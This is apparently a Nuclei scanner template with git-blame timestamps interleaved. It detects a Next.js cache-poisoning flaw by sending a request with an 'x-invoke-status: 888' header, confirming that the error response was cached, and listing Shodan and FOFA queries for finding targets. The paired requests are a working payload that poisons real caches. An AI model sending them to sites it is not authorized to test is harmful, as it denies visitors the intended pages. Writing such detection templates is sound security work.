2024-06-27 10:20:38 +00:00
id : next-js-cache-poisoning
2024-06-25 09:00:40 +00:00
info :
name : Next.js Cache Poisoning
2024-06-25 09:15:49 +00:00
author : Ice3man543
2024-06-25 09:00:40 +00:00
severity : high
description : |
Next.js is vulnerable to cache poisoning through the x-middleware-prefetch and x-invoke-status headers. This can result in DoS by serving an empty JSON object or error page instead of the intended content, affecting SSR responses.
reference :
- https://github.com/vercel/next.js/compare/v13.4.20-canary.12...v13.4.20-canary.13
- https://github.com/valentin-panov/nextjs-no-cache-issue
2024-06-27 05:31:29 +00:00
- https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole
2024-06-25 09:00:40 +00:00
metadata :
vendor : vercel
product : next.js
framework : node.js
shodan-query :
- http.html:"/_next/static"
- cpe:"cpe:2.3:a:zeit:next.js"
fofa-query : body="/_next/static"
2024-06-25 09:15:49 +00:00
tags : cve,cve2023,next-js,cache
2024-06-25 09:00:40 +00:00
2024-06-25 09:08:39 +00:00
variables :
rand : "{{rand_text_numeric(5)}}"
2024-06-25 09:20:06 +00:00
2024-06-25 09:00:40 +00:00
http :
- raw :
- |
2024-06-25 09:08:39 +00:00
GET /?cb={{rand}} HTTP/1.1
2024-06-25 09:00:40 +00:00
Host : {{Hostname}}
Priority : u=1
x-invoke-status : 888
- |
2024-06-25 09:08:39 +00:00
GET /?cb={{rand}} HTTP/1.1
2024-06-25 09:00:40 +00:00
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
- "status_code_1 == 888 && contains(body_1, '/_error')"
- "status_code_2 == 888 && contains(body_2, '/_error')"
condition : and
2024-06-27 15:15:10 +00:00
# digest: 490a004630440220431ffc17e1380ac71114b178c14ff533c132b114aaf6b6836f0f3da876cf438a022057a9d4cbba84903a9a9d2313346398135d45c8ec9cadbfc650737ffc5e174535:922c64590222798bb761d5b6d8e72950
